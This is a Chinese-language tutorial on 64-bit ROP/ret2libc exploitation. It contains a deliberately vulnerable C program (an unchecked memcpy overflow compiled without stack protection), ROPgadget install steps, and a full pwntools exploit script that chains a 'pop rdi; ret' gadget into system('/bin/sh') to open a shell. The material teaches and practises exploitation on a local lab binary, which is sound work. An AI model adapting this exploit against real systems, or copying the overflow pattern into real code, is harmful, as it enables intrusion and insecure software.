上回弄了個32位的NX機(jī)制及策略-Ret2libc,這次弄一個64位的

將代碼在x64平臺上編譯運(yùn)行，不同于x86，x64平臺前六個整型或指針參數(shù)依次保存在RDI, RSI, RDX, RCX, R8和R9寄存器里，如果還有更多的參數(shù)的話才會保存在棧上

也就是說按之前的想法調(diào)用system函數(shù)，參數(shù)是/bin/sh的話,我們要想辦法在棧布局時，先將/bin/sh傳給rdi寄存器，再調(diào)用sytem函數(shù)

一，ROP

ROP(Return Oriented Programming)即面向返回地址編程，其主要思想是在棧緩沖區(qū)溢出的基礎(chǔ)上，通過利用程序中已有的小片段(gadgets)來改變某些寄存器或者變量的值，從而改變程序的執(zhí)行流程，達(dá)到預(yù)期利用目的。

1.假設(shè)現(xiàn)有一個存在有棧溢出漏洞的棧空間布局如下：

2.我們通過布局，改變?yōu)椋?/h3>

①gadget_addr指向的是程序中可以利用的小片段代碼，這里使用的是pop rdi ; ret ;
對于這種搜索，我們可以使用一個工具：ROPgadget

安裝
$ git clone -b master git@github.com:JonathanSalwan/ROPgadget.git
$ cd ROPgadget
$ cd ./dependencies/capstone-next
$ ./make.sh
$ sudo ./make.sh install
$ cd ./bindings/python
$ make
$ sudo make install

②bin_sh_addr指向的是字符串參數(shù):'/bin/sh'

③system_addr則指向system函數(shù)

3.布局說明

①當(dāng)程序運(yùn)行到gadget_addr時（rsp指向gadget_addr），接下來會跳轉(zhuǎn)到小片段里執(zhí)行命令，同時rsp+8(rsp指向bin_sh_addr)

②然后執(zhí)行pop rdi,將bin_sh_addr彈入rdi寄存器中，同時rsp + 8(rsp指向system_addr)

③執(zhí)行return指令，因?yàn)檫@時rsp是指向system_addr的，這時就會調(diào)用system函數(shù)，而參數(shù)是通過rdi傳遞的，也就是會將/bin/sh傳入，從而實(shí)現(xiàn)調(diào)用system('/bin/sh')

二，測試

1，源碼

文件名：StackOF.c

#include <stdio.h>
#include <string.h>

void vul(char *msg)
{
   char buffer[64];
   memcpy(buffer,msg,128);
   return;
}

int main()
{
   puts("So plz give me your shellcode:");
   char buffer[256];
   memset(buffer,0,256);
   read(0,buffer,256);
   vul(buffer);
   return 0;
}
   

2.編譯

gcc -g -ggdb -fno-stack-protector -no-pie StackOF.c -o pwnme

3.查看屬性及保護(hù)措施

4.查看加載的libc文件及地址

ldd pwnme

cp /lib/x86_64-linux-gnu/libc.so.6 你的目錄

5.代碼

文件名：exp.py

from pwn import *

p = process('./pwnme')
p.recvuntil("shellcode:")

elf = ELF('libc.so.6')

system_in_libc = elf.symbols['system']                  #system在libc文件里的偏移地址
#print hex(system_in_libc)  
bin_sh_in_libc = next(elf.search('/bin/sh'))            #/'bin/sh'字符串在libc里的偏移地址
#print hex(bin_sh_in_libc)

libc_base = 0x00007ffff7dee000                        #libc加載的基址
gadget_addr =  0x0000000000401243                     #搜索到的gadget片段的地址
system_addr = libc_base + system_in_libc              #system在程序里的地址
bin_sh_addr = libc_base + bin_sh_in_libc                #/bin/sh在程序里的地址

print hex(system_addr) +'----'+hex(bin_sh_addr)

#布局
buf = 'A'*72                                                 #如何得到填充數(shù)據(jù)大?。篽ttp://www.itdecent.cn/p/278f8d1f8322
buf += p64(gadget_addr)
buf += p64(bin_sh_addr)
buf += p64(system_addr)

with open('poc','wb') as f :
    f.write(buf)

p.sendline(buf)                                                  #開始溢出
p.interactive()

6.運(yùn)行

python exp.py